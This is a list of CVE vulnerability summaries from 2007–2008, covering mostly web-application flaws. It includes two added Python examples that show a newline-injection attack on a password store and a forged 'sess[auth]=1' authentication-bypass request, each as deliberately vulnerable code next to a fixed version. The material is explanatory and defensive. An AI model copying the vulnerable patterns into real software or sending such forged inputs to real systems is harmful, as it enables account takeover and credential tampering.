[CVE-2008-0454] Cross-zone scripting vulnerability in the Internet Explorer web control in Skype 3.6.0.244, and earlier 3.5.x and 3.6.x versions, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via the Title field of a (1) Dailymotion and possibly (2) Metacafe movie in the Skype video gallery, accessible through a search within the "Add video to chat" dialog, aka "videomood XSS."
[CVE-2008-0447] SQL injection vulnerability in index.php in Foojan WMS PHP Weblog 1.0 allows remote attackers to execute arbitrary SQL commands via the story parameter.
[CVE-2008-0444] Cross-site scripting (XSS) vulnerability in Electronic Logbook (ELOG) before 2.7.0 allows remote attackers to inject arbitrary web script or HTML via subtext parameter to unspecified components.
[CVE-2008-0442] PHP remote file inclusion vulnerability in inc/linkbar.php in Small Axe Weblog 0.3.1 allows remote attackers to execute arbitrary PHP code via a URL in the ffile parameter, a different vector than CVE-2008-0376. NOTE: the provenance of this information is unknown
[CVE-2008-0439] Cross-site scripting (XSS) vulnerability in templates/default/admincp/attachments_header.php in DeluxeBB 1.1 allows remote attackers to inject arbitrary web script or HTML via the lang_listofmatches parameter.
[CVE-2008-0438] Cross-site scripting (XSS) vulnerability in the font rendering functionality in Novemberborn sIFR 2.0.2 allows remote attackers to inject arbitrary web script or HTML via the txt parameter to a Flash (SWF) file, as demonstrated by fonts/FuturaLt.swf.
[CVE-2008-0437] Multiple buffer overflows in the WebHPVCInstall.HPVirtualRooms14 ActiveX control in HPVirtualRooms14.dll 1.0.0.100, as used in the installation process for HP Virtual Rooms, allow remote attackers to execute arbitrary code via a long (1) AuthenticationURL, (2) PortalAPIURL, or (3) cabroot property value. NOTE: some of these details are obtained from third party information.
[CVE-2008-0436] Cross-site scripting (XSS) vulnerability in profile-upload/upload.asp in PD9 Software MegaBBS 1.5.14b allows remote attackers to inject arbitrary web script or HTML via the target parameter.
[CVE-2008-0432] Cross-site scripting (XSS) vulnerability in index.php in phpAutoVideo 2.21 and earlier allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2008-0430] SQL injection vulnerability in form.php in 360 Web Manager 3.0 allows remote attackers to execute arbitrary SQL commands via the IDFM parameter.
[CVE-2008-0426] Multiple cross-site scripting (XSS) vulnerabilities in submit.php in PacerCMS before 0.6.1 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) headline, or (3) text field in a message.
[CVE-2008-0417] CRLF injection vulnerability in Mozilla Firefox before 2.0.0.12 allows remote user-assisted web sites to corrupt the user's password store via newlines that are not properly handled when the user saves a password.
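The failure mode behind CVE-2008-0417 above is a line-oriented store that writes an attacker-chosen field verbatim: a newline inside the saved password becomes a record separator and the site can plant a credential record for a host the user never visited. The following is an added example, not Firefox code, and it uses a constructed tab-separated format rather than Firefox's real signons file; the hostnames and the injected password string are constructed as well.

```python
import base64

# Constructed, simplified line-oriented store: one record per line,
# fields separated by tabs.  This is an assumed format for illustration,
# not the layout of Firefox's actual password file.


def serialise_naive(records):
    """Vulnerable writer: fields go to disk verbatim, so a password that
    contains a newline (or a tab) starts a new record."""
    return "".join(f"{host}\t{user}\t{password}\n" for host, user, password in records)


def parse_store(text):
    """Reader shared by both writers; returns (host, user, password) tuples."""
    out = []
    for line in text.split("\n"):
        if not line:
            continue
        fields = line.split("\t")
        if len(fields) != 3:
            raise ValueError(f"malformed record: {line!r}")
        out.append(tuple(fields))
    return out


def _enc(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


def _dec(s: str) -> str:
    return base64.b64decode(s).decode()


def serialise_safe(records):
    """Hardened writer: every field is base64-encoded, so the record and
    field separators can never appear inside a field, whatever a site sends."""
    return "".join(f"{_enc(h)}\t{_enc(u)}\t{_enc(p)}\n" for h, u, p in records)


def parse_safe(text):
    return [(_dec(h), _dec(u), _dec(p)) for h, u, p in parse_store(text)]


# Constructed attacker-controlled "password" that the site asked the browser to save.
INJECTED = "hunter2\nhttps://bank.example\tvictim\tattacker-chosen"
RECORDS = [("https://evil.example", "victim", INJECTED)]


def injected_records():
    """Round trip through the naive store: two records come back, the
    second one for a host the user never logged into."""
    return parse_store(serialise_naive(RECORDS))


def safe_round_trip():
    """Round trip through the hardened store: the original record, intact."""
    return parse_safe(serialise_safe(RECORDS))


if __name__ == "__main__":
    for rec in injected_records():
        print("naive store:", rec)
    for rec in safe_round_trip():
        print("safe store: ", rec)
```

Encoding every field is one fix; rejecting any control character in a field before it is saved is another. Either way the rule is the same as for HTTP header injection: the serializer, not the caller, must guarantee that a field cannot contain the separator.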
[CVE-2008-0416] Multiple cross-site scripting (XSS) vulnerabilities in Mozilla Firefox before 2.0.0.12, Thunderbird before 2.0.0.12, and SeaMonkey before 1.1.8 allow remote attackers to inject arbitrary web script or HTML via certain character encodings, including (1) a backspace character that is treated as whitespace, (2) 0x80 with Shift_JIS encoding, and (3) "zero-length non-ASCII sequences" in certain Asian character sets.
[CVE-2008-0409] Cross-site scripting (XSS) vulnerability in HTTP File Server (HFS) before 2.2c allows remote attackers to inject arbitrary web script or HTML via the userinfo subcomponent of a URL.
[CVE-2008-0404] Cross-site scripting (XSS) vulnerability in Mantis before 1.1.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to the "Most active bugs" summary.
[CVE-2008-0403] The web server in Belkin Wireless G Plus MIMO Router F5D9230-4 does not require authentication for SaveCfgFile.cgi, which allows remote attackers to read and modify configuration via a direct request to SaveCfgFile.cgi.
[CVE-2008-0402] Unspecified vulnerability in IBM WebSphere Business Modeler Basic and Advanced 6.0.2.1 before Interim Fix 11 allows remote authenticated users to bypass intended access restrictions and delete unspecified repository resources via unknown vectors, even when they are not administrators or members of the repository's owning group.
[CVE-2008-0400] Cross-site scripting (XSS) vulnerability in header.tpl.php in the modern template for Singapore 0.10.1 allows remote attackers to inject arbitrary web script or HTML via the gallery parameter to default.php.
[CVE-2008-0398] Cross-site scripting (XSS) vulnerability in aflog 1.01, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the comment form.
[CVE-2008-0389] Unspecified vulnerability in the serveServletsByClassnameEnabled feature in IBM WebSphere Application Server (WAS) 6.0 through 6.0.2.25, 6.1 through 6.1.0.14, and 5.1.1.x before 5.1.1.18 has unknown impact and attack vectors.
[CVE-2008-0384] OpenBSD 4.2 allows local users to cause a denial of service (kernel panic) by calling the SIOCGIFRTLABEL IOCTL on an interface that does not have a route label, which triggers a NULL pointer dereference when the return value from the rtlabel_id2name function is not checked.
[CVE-2008-0376] PHP remote file inclusion vulnerability in inc/linkbar.php in Small Axe Weblog 0.3.1 allows remote attackers to execute arbitrary PHP code via a URL in the cfile parameter.
[CVE-2008-0375] Unspecified vulnerability in OKI C5510MFP Printer CU H2.15, PU 01.03.01, System F/W 1.01, and Web Page 1.00 allows remote attackers to set the password and obtain administrative access via unspecified vectors.
[CVE-2008-0374] OKI C5510MFP Printer CU H2.15, PU 01.03.01, System F/W 1.01, and Web Page 1.00 sends the configuration of the printer in cleartext, which allows remote attackers to obtain the administrative password by connecting to TCP port 5548 or 7777.
[CVE-2008-0370] Cross-site scripting (XSS) vulnerability in dohtaccess.html in cPanel before 11.17 build 19417 allows remote attackers to inject arbitrary web script or HTML via the rurl parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-0362] Cross-site scripting (XSS) vulnerability in gallery.php in Clever Copy 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the album parameter.
[CVE-2008-0359] Multiple cross-site scripting (XSS) vulnerabilities in BLOG:CMS 4.2.1b allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) admin.php or (2) index.php in photo/.
[CVE-2008-0354] Cross-site scripting (XSS) vulnerability in the chat client in IBM Lotus Sametime 7.5 and 7.5.1 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted message, which triggers code execution after a mouseover event initiated by the victim.
[CVE-2008-0350] admin/index.php in Evilsentinel 1.0.9 and earlier sends a redirect to the web browser but does not exit, which allows remote attackers to gain administrative privileges and make arbitrary configuration changes.
[CVE-2008-0338] Directory traversal vulnerability in the mwGetLocalFileName function in http.c in MiniWeb HTTP Server 0.8.19 allows remote attackers to read arbitrary files and list arbitrary directories via a (1) .%2e (partially encoded dot dot) or (2) %2e%2e (encoded dot dot) in the URI.
[CVE-2008-0337] Heap-based buffer overflow in the _mwProcessReadSocket function in http.c in MiniWeb HTTP Server 0.8.19 allows remote attackers to execute arbitrary code via a long URI.
[CVE-2008-0335] Cross-site scripting (XSS) vulnerability in BugTracker.NET before 2.7.2 allows remote attackers to inject arbitrary web script or HTML via an arbitrary custom text field.
[CVE-2008-0334] Cross-site scripting (XSS) vulnerability in pm/language/spanish/preferences.php in PMachine Pro 2.4.1 allows remote attackers to inject arbitrary web script or HTML via the L_PREF_NAME[855] parameter.
[CVE-2008-0333] Directory traversal vulnerability in download_view_attachment.aspx in AfterLogic MailBee WebMail Pro 4.1 for ASP.NET allows remote attackers to read arbitrary files via a .. (dot dot) in the temp_filename parameter.
[CVE-2008-0322] The I2O Utility Filter driver (i2omgmt.sys) 5.1.2600.2180 for Microsoft Windows XP sets Everyone/Write permissions for the "\\.\I2OExc" device interface, which allows local users to gain privileges. NOTE: this issue can be leveraged to overwrite arbitrary memory and execute code via an IOCTL call with a crafted DeviceObject pointer.
[CVE-2008-0313] The ActiveDataInfo.LaunchProcess method in the SymAData.ActiveDataInfo.1 ActiveX control 2.7.0.1 in SYMADATA.DLL in multiple Symantec Norton products including Norton 360 1.0, AntiVirus 2006 through 2008, Internet Security 2006 through 2008, and System Works 2006 through 2008, does not properly determine the location of the AutoFix Tool, which allows remote attackers to execute arbitrary code via a remote (1) WebDAV or (2) SMB share.
[CVE-2008-0311] Stack-based buffer overflow in the PGMWebHandler::parse_request function in the StarTeam Multicast Service component (STMulticastService) 6.4 in Borland CaliberRM 2006 allows remote attackers to execute arbitrary code via a large HTTP request.
[CVE-2008-0298] KHTML WebKit as used in Apple Safari 2.x allows remote attackers to cause a denial of service (browser crash) via a crafted web page, possibly involving a STYLE attribute of a DIV element.
[CVE-2008-0292] Cross-site scripting (XSS) vulnerability in photo_album.pl in Dansie Photo Album 1.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: the provenance of this information is unknown
[CVE-2008-0284] Cross-site scripting (XSS) vulnerability in Simple Machines Forum (SMF) 1.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) Itemid or (2) topic arguments.
[CVE-2008-0276] Cross-site scripting (XSS) vulnerability in the Devel module before 5.x-0.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via a site variable, related to lack of escaping of the variable table.
[CVE-2008-0274] Cross-site scripting (XSS) vulnerability in Drupal 4.7.x and 5.x, when certain .htaccess protections are disabled, allows remote attackers to inject arbitrary web script or HTML via crafted links involving theme .tpl.php files.
[CVE-2008-0271] The editor deletion form in BUEditor 4.7.x before 4.7.x-1.0 and 5.x before 5.x-1.1, a module for Drupal, does not follow Drupal's Forms API submission model, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and delete custom editor interfaces.
[CVE-2008-0268] Cross-site scripting (XSS) vulnerability in view.php in eTicket 1.5.5.2 allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2008-0258] Cross-site scripting (XSS) vulnerability in index.php in PHP Running Management (phpRunMan) before 1.0.3 allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2008-0257] Cross-site scripting (XSS) vulnerability in search.pl in Dansie Search Engine 2.7 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. NOTE: the provenance of this information is unknown
[CVE-2008-0249] PHP Webquest 2.6 allows remote attackers to retrieve database credentials via a direct request to admin/backup_phpwebquest.php, which leaks the credentials in an error message if a call to /usr/bin/mysqldump fails. NOTE: this might only be an issue in limited environments.
[CVE-2008-0241] Open redirect vulnerability in /idm/user/login.jsp in Sun Java System Identity Manager 6.0 SP1 through SP3, 7.0, and 7.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the nextPage parameter.
[CVE-2008-0240] /idm/help/index.jsp in Sun Java System Identity Manager 6.0 SP1 through SP3, 7.0, and 7.1 allows remote attackers to inject frames from arbitrary web sites and conduct phishing attacks via the helpUrl parameter, aka "frame injection."
[CVE-2008-0239] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Identity Manager 6.0 SP1 through SP3, 7.0, and 7.1 allow remote attackers to inject arbitrary HTML or web script via the (1) cntry or lang parameters to /idm/login.jsp, (2) resultsForm parameter to /idm/account/findForSelect.jsp, or (3) activeControl parameter to /idm/user/main.jsp.
[CVE-2008-0231] Multiple directory traversal vulnerabilities in index.php in Tuned Studios (1) Subwoofer, (2) Freeze Theme, (3) Orange Cutout, (4) Lonely Maple, (5) Endless, (6) Classic Theme, and (7) Music Theme webpage templates allow remote attackers to include and execute arbitrary files via ".." sequences in the page parameter. NOTE: this can be leveraged for remote file inclusion when running in some PHP 5 environments.
[CVE-2008-0221] Directory traversal vulnerability in the WebLaunch.WeblaunchCtl.1 (aka CWebLaunchCtl) ActiveX control in weblaunch.ocx 1.0.0.1 in Gateway Weblaunch allows remote attackers to execute arbitrary programs via a ..\ (dot dot backslash) in the second argument to the DoWebLaunch method. NOTE: some of these details are obtained from third party information.
[CVE-2008-0220] Multiple stack-based buffer overflows in the WebLaunch.WeblaunchCtl.1 (aka CWebLaunchCtl) ActiveX control in weblaunch.ocx 1.0.0.1 in Gateway Weblaunch allow remote attackers to execute arbitrary code via a long string in the (1) second or (2) fourth argument to the DoWebLaunch method. NOTE: some of these details are obtained from third party information.
[CVE-2008-0219] SQL injection vulnerability in soporte_horizontal_w.php in PHP Webquest 2.6 allows remote attackers to execute arbitrary SQL commands via the id_actividad parameter, a different vector than CVE-2007-4920.
[CVE-2008-0218] Cross-site scripting (XSS) vulnerability in admin/index.html in Merak IceWarp Mail Server allows remote attackers to inject arbitrary web script or HTML via the message parameter. NOTE: the provenance of this information is unknown
[CVE-2008-0210] Uebimiau Webmail 2.7.10 and 2.7.2 does not protect authentication state variables from being set through HTTP requests, which allows remote attackers to bypass authentication via a sess[auth]=1 parameter setting. NOTE: this can be leveraged to conduct directory traversal attacks without authentication by using CVE-2008-0140.
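The pattern in CVE-2008-0210 above is a session rebuilt from request parameters, so the client can write the same keys the login code writes. The block below is an added example of that pattern and of the allow-list fix; it is not Uebimiau code. The parameter name sess[auth] and the value 1 come from the entry, while the query string, the allow-listed keys and the login helper are assumptions.

```python
from urllib.parse import parse_qsl

# Assumed reconstruction: the application copies every sess[key]=value pair
# from the request into its session array, so a client can set sess[auth]=1.
AUTH_FLAG = "auth"


def session_from_request_vulnerable(query: str, session: dict) -> dict:
    """Every sess[key]=value pair in the request overwrites session state."""
    for name, value in parse_qsl(query):
        if name.startswith("sess[") and name.endswith("]"):
            session[name[5:-1]] = value
    return session


# Only presentation keys may be supplied by the client in the fixed version.
ALLOWED_FROM_CLIENT = {"lang", "theme"}


def session_from_request_fixed(query: str, session: dict) -> dict:
    """Allow-listed keys only; authentication state is written solely by login()."""
    for name, value in parse_qsl(query):
        if name.startswith("sess[") and name.endswith("]"):
            key = name[5:-1]
            if key in ALLOWED_FROM_CLIENT:
                session[key] = value
    return session


def login(session: dict, user: str, password: str, credentials: dict) -> bool:
    """The one legitimate writer of the auth flag (credential check is illustrative)."""
    if credentials.get(user) == password:
        session[AUTH_FLAG] = "1"
        session["user"] = user
        return True
    return False


def is_authenticated(session: dict) -> bool:
    return session.get(AUTH_FLAG) == "1"


# Constructed forged request: the attacker asserts an authenticated session.
FORGED_QUERY = "sess[auth]=1&sess[user]=admin&sess[lang]=en"

if __name__ == "__main__":
    print("vulnerable:", is_authenticated(session_from_request_vulnerable(FORGED_QUERY, {})))
    print("fixed:     ", is_authenticated(session_from_request_fixed(FORGED_QUERY, {})))
```

The same bug appears wherever request data is merged wholesale into a trusted structure (PHP register_globals, extract($_REQUEST), mass assignment in web frameworks); the fix is always an explicit list of client-writable keys, never a deny-list of sensitive ones.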
[CVE-2008-0209] Open redirect vulnerability in Forums/login.asp in Snitz Forums 2000 3.4.06 and earlier allows remote attackers to redirect users to arbitrary web sites via a URL in the target parameter.
[CVE-2008-0208] Cross-site scripting (XSS) vulnerability in login.asp in Snitz Forums 2000 3.4.05 and earlier allows remote attackers to inject arbitrary web script or HTML via the target parameter.
[CVE-2008-0207] Multiple cross-site scripting (XSS) vulnerabilities in PRO-Search 0.17 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) prot, (2) host, (3) path, (4) name, (5) ext, (6) size, (7) search_days, or (8) show_page parameter to the default URI.
[CVE-2008-0206] Multiple cross-site scripting (XSS) vulnerabilities in captcha\captcha.php in the Captcha! 2.5d and earlier plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) captcha_ttffolder, (2) captcha_numchars, (3) captcha_ttfrange, or (4) captcha_secret parameter.
[CVE-2008-0204] Multiple cross-site scripting (XSS) vulnerabilities in math-comment-spam-protection.php in the Math Comment Spam Protection 2.1 and earlier plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) mcsp_opt_msg_no_answer or (2) mcsp_opt_msg_wrong_answer parameter to wp-admin/options-general.php.
[CVE-2008-0203] Multiple cross-site scripting (XSS) vulnerabilities in cryptographp/admin.php in the Cryptographp 1.2 and earlier plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) cryptwidth, (2) cryptheight, (3) bgimg, (4) charR, (5) charG, (6) charB, (7) charclear, (8) tfont, (9) charel, (10) charelc, (11) charelv, (12) charnbmin, (13) charnbmax, (14) charspace, (15) charsizemin, (16) charsizemax, (17) charanglemax, (18) noisepxmin, (19) noisepxmax, (20) noiselinemin, (21) noiselinemax, (22) nbcirclemin, (23) nbcirclemax, or (24) brushsize parameter to wp-admin/options-general.php.
[CVE-2008-0201] Cross-site scripting (XSS) vulnerability in index.php in ExpressionEngine 1.2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the URL parameter.
[CVE-2008-0200] Multiple cross-site scripting (XSS) vulnerabilities in account/index.html in RotaBanner Local 3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user or (2) drop parameter.
[CVE-2008-0197] Multiple cross-site scripting (XSS) vulnerabilities in wp-contact-form/options-contactform.php in the WP-ContactForm 1.5 alpha and earlier plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) wpcf_email, (2) wpcf_subject, (3) wpcf_question, (4) wpcf_answer, (5) wpcf_success_msg, (6) wpcf_error_msg, or (7) wpcf_msg parameter to wp-admin/admin.php, or (8) the SRC attribute of an IFRAME element.
[CVE-2008-0193] Cross-site scripting (XSS) vulnerability in wp-db-backup.php in WordPress 2.0.11 and earlier, and possibly 2.1.x through 2.3.x, allows remote attackers to inject arbitrary web script or HTML via the backup parameter in a wp-db-backup.php action to wp-admin/edit.php.
[CVE-2008-0192] Multiple cross-site scripting (XSS) vulnerabilities in WordPress 2.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the popuptitle parameter to (1) wp-admin/post.php or (2) wp-admin/page-new.php.
[CVE-2008-0190] Multiple cross-site scripting (XSS) vulnerabilities in templates/example_template.php in AwesomeTemplateEngine allow remote attackers to inject arbitrary web script or HTML via the (1) data[title], (2) data[message], (3) data[table][1][item], (4) data[table][1][url], or (5) data[poweredby] parameter.
[CVE-2008-0187] SQL injection vulnerability in songinfo.php in SAM Broadcaster samPHPweb, possibly 4.2.2 and earlier, allows remote attackers to execute arbitrary SQL commands via the songid parameter.
[CVE-2008-0186] Cross-site scripting (XSS) vulnerability in index.php in NetRisk 1.9.7 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter, possibly related to CVE-2008-0144.
[CVE-2008-0181] Cross-site scripting (XSS) vulnerability in the Admin portlet in Liferay Portal 4.3.6 allows remote authenticated users to inject arbitrary web script or HTML via the Shutdown message.
[CVE-2008-0180] Cross-site scripting (XSS) vulnerability in themes/_unstyled/templates/init.vm in Liferay Portal 4.3.6 allows remote authenticated users to inject arbitrary web script or HTML via the Greeting field in a User Profile.
[CVE-2008-0179] Cross-site scripting (XSS) vulnerability in service/impl/UserLocalServiceImpl.java in Liferay Portal 4.3.6 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header, which is used when composing Forgot Password e-mail messages in HTML format.
[CVE-2008-0178] Cross-site scripting (XSS) vulnerability in the Enterprise Admin Session Monitoring component in Liferay Portal 4.3.6 allows remote authenticated users to inject arbitrary web script or HTML via the User-Agent HTTP header.
[CVE-2008-0155] Cross-site scripting (XSS) vulnerability in index.php in EvilBoard 0.1a (Alpha) allows remote attackers to inject arbitrary web script or HTML via the c parameter.
[CVE-2008-0150] Unspecified vulnerability in the LDAP authentication feature in Aruba Mobility Controller 2.3.6.15, 2.5.2.11, 2.5.4.25, 2.5.5.7, 3.1.1.3, and 2.4.8.11-FIPS or earlier allows remote attackers to bypass authentication mechanisms and obtain management or VPN interface access.
[CVE-2008-0146] Cross-site scripting (XSS) vulnerability in the error page in W3-mSQL allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the top-level URI.
[CVE-2008-0143] PHP remote file inclusion vulnerability in common/db.php in samPHPweb, possibly 4.2.2 and others, as provided with SAM Broadcaster, allows remote attackers to execute arbitrary PHP code via a URL in the commonpath parameter.
[CVE-2008-0142] Multiple SQL injection vulnerabilities in WebPortal CMS 0.6-beta allow remote attackers to execute arbitrary SQL commands via the user_name parameter to actions.php, and unspecified other vectors.
[CVE-2008-0141] actions.php in WebPortal CMS 0.6-beta generates predictable passwords containing only the time of day, which makes it easier for remote attackers to obtain access to any account via a lostpass action.
[CVE-2008-0140] Directory traversal vulnerability in error.php in Uebimiau Webmail 2.7.10 and 2.7.2 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the selected_theme parameter, a different vector than CVE-2007-3172.
[CVE-2008-0135] Snitz Forums 2000 3.4.06 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for forum/snitz_forums_2000.mdb.
[CVE-2008-0134] Cross-site scripting (XSS) vulnerability in Forums/setup.asp in Snitz Forums 2000 3.4.06 and earlier allows remote attackers to inject arbitrary web script or HTML via the MAIL parameter.
[CVE-2008-0131] Cross-site scripting (XSS) vulnerability in login_form.asp in Instant Softwares Dating Site allows remote attackers to inject arbitrary web script or HTML via the msg parameter, a different product than CVE-2006-6022. NOTE: the provenance of this information is unknown
[CVE-2008-0127] The administration interface in McAfee E-Business Server 8.5.2 and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a long initial authentication packet.
[CVE-2008-0125] Cross-site scripting (XSS) vulnerability in phpstats.php in Michael Wagner phpstats 0.1 alpha allows remote attackers to inject arbitrary web script or HTML via the baseDir parameter.
[CVE-2008-0124] Cross-site scripting (XSS) vulnerability in Serendipity (S9Y) before 1.3-beta1 allows remote authenticated users to inject arbitrary web script or HTML via (1) the "Real name" field in Personal Settings, which is presented to readers of articles
[CVE-2008-0123] Cross-site scripting (XSS) vulnerability in install.php for Moodle 1.8.3, and possibly other versions before 1.8.4, allows remote attackers to inject arbitrary web script or HTML via the dbname parameter. NOTE: this issue only exists until the installation is complete.
[CVE-2008-0093] Multiple cross-site scripting (XSS) vulnerabilities in newticket.php in eTicket 1.5.5.2, and 1.5.6 RC2 and RC3, allow remote attackers to inject arbitrary web script or HTML via the (1) Name and (2) Subject parameters.
[CVE-2008-0092] Cross-site scripting (XSS) vulnerability in index.php in the search module in Appalachian State University phpWebSite 1.4.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2008-0091] Directory traversal vulnerability in download2.php in AGENCY4NET WEBFTP 1 allows remote attackers to read and delete arbitrary files via a .. (dot dot) in the file parameter.
[CVE-2008-0080] Heap-based buffer overflow in the WebDAV Mini-Redirector in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, and Vista allows remote attackers to execute arbitrary code via a crafted WebDAV response.
[CVE-2008-0050] CFNetwork in Apple Mac OS X 10.4.11 allows remote HTTPS proxy servers to spoof secure websites via data in a 502 Bad Gateway error.
[CVE-2008-0041] Parental Controls in Apple Mac OS X 10.5 through 10.5.1 contacts www.apple.com "when a website is unblocked," which allows remote attackers to determine when a system is running Parental Controls.
[CVE-2008-0026] SQL injection vulnerability in Cisco Unified CallManager/Communications Manager (CUCM) 5.0/5.1 before 5.1(3a) and 6.0/6.1 before 6.1(1a) allows remote authenticated users to execute arbitrary SQL commands via the key parameter to the (1) admin and (2) user interface pages.
[CVE-2008-0020] Unspecified vulnerability in the Load method in the IPersistStreamInit interface in the Active Template Library (ATL), as used in the Microsoft Video ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption, aka "ATL Header Memcopy Vulnerability," a different vulnerability than CVE-2008-0015.
[CVE-2008-0015] Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka "Microsoft Video ActiveX Control Vulnerability."
[CVE-2007-6751] Cross-site scripting (XSS) vulnerability in the MailForm plugin before 1.20 for Movable Type allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-6728] Cross-site scripting (XSS) vulnerability in XMB 1.5 allows remote attackers to inject arbitrary web script or HTML via the MSN field during user registration.
[CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
[CVE-2007-6711] Unspecified vulnerability in customer.php in FreeWebshop.org 2.2.5, 2.2.6 and 2.2.7WIP1/2 allows remote attackers to gain administrator privileges via unknown vectors.
[CVE-2007-6707] Multiple cross-site scripting (XSS) vulnerabilities on the Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.01.03 and earlier firmware allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2007-3574.
[CVE-2007-6705] The WebSphere MQ XA 5.3 before FP13 and 6.0.x before 6.0.2.1 client for Windows, when running in an MTS or a COM+ environment, grants the PROCESS_DUP_HANDLE privilege to the Everyone group upon connection to a queue manager, which allows local users to duplicate an arbitrary handle and possibly hijack an arbitrary process.
[CVE-2007-6704] Multiple cross-site scripting (XSS) vulnerabilities in F5 FirePass 4100 SSL VPN 5.4.1 through 5.5.2 and 6.0 through 6.0.1, when pre-logon sequences are enabled, allow remote attackers to inject arbitrary web script or HTML via the query string to (1) my.activation.php3 and (2) my.logon.php3.
[CVE-2007-6702] goform/QuickStart_c0 on the GoAhead Web Server on the FS4104-AW (aka rooter) VDSL device contains a password in the typepassword field, which allows remote attackers to obtain this password by reading the HTML source, a different vulnerability than CVE-2002-1603.
[CVE-2007-6696] Multiple cross-site scripting (XSS) vulnerabilities in WebCalendar 1.1.6 allow remote attackers to inject arbitrary web script or HTML via (1) an event description, (2) the query string to pref.php, and (3) the adv parameter to search.php. NOTE: vector 1 requires user authentication.
[CVE-2007-6695] Cross-site scripting (XSS) vulnerability in index.php in Drake CMS 0.4.9 allows remote attackers to inject arbitrary web script or HTML via the option parameter.
[CVE-2007-6693] Unspecified vulnerability in the WebCam module in Menalto Gallery before 2.2.4 has unknown impact and attack vectors related to a "proxied request."
[CVE-2007-6692] Open redirect vulnerability in Menalto Gallery before 2.2.4 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the (1) Core and (2) print modules.
[CVE-2007-6691] Multiple unspecified vulnerabilities in Menalto Gallery before 2.2.4 have unknown impact, related to (1) "hotlink protection" in the URL rewrite module, (2) a WebDAV view in the WebDAV module, (3) a comment view in the Comment module, (4) unspecified "item information disclosure attacks" in the Core module Gallery application, (5) the slideshow in the Slideshow module, and (6) multiple Print modules.
[CVE-2007-6688] Unspecified vulnerability in the Installation application in Menalto Gallery before 2.2.4 has unknown impact and attack vectors related to "web-accessibility protection of the storage folder."
[CVE-2007-6687] Multiple cross-site scripting (XSS) vulnerabilities in Menalto Gallery before 2.2.4 allow remote attackers to inject arbitrary web script or HTML via crafted filenames to the (1) Core or (2) add-item modules
[CVE-2007-6679] Unspecified vulnerability in the Administrative Console in IBM WebSphere Application Server 6.1 before Fix Pack 13 has unknown impact and attack vectors, related to "security concerns with monitor role users." NOTE: it was later reported that 6.0.2 before Fix Pack 25 is also affected.
[CVE-2007-6677] Cross-site scripting (XSS) vulnerability in Peter's Random Anti-Spam Image 0.2.4 and earlier plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the comment field in the comment form.
[CVE-2007-6674] Cross-site scripting (XSS) vulnerability in Default.asp in RapidShare Database allows remote attackers to inject arbitrary web script or HTML via the Arayalim parameter.
[CVE-2007-6673] Cross-site scripting (XSS) vulnerability in Makale Scripti allows remote attackers to inject arbitrary web script or HTML via the ara parameter to the default URI under Ara/ in a search action.
[CVE-2007-6669] Cross-site scripting (XSS) vulnerability in search.php in PHCDownload 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the string parameter.
[CVE-2007-6664] SQL injection vulnerability in index.php in WebPortal CMS 0.6.0 and earlier allows remote attackers to execute arbitrary SQL commands via the m parameter.
[CVE-2007-6659] Multiple cross-site scripting (XSS) vulnerabilities in 2z project 0.9.6.1 allow remote attackers to inject arbitrary web script or HTML via the (1) contentshort or (2) contentfull parameter in an addnews action to the default URI
